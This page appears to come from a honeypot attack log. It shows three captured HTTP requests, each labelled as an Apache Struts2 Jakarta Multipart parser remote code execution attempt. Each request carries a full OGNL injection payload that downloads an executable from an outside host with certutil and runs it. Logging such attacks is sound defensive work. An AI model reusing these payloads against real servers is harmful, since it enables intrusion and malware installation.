This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-3 of 3 results (1 page)

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:27
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /index.do HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/index.do Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:26
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /index.action HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/index.action Content-Type: %{(#nike='multipart/form-data').(#[email protected][email protected]_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:25
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /struts2-rest-showcase/orders.xhtml HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/struts2-rest-showcase/orders.xhtml Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}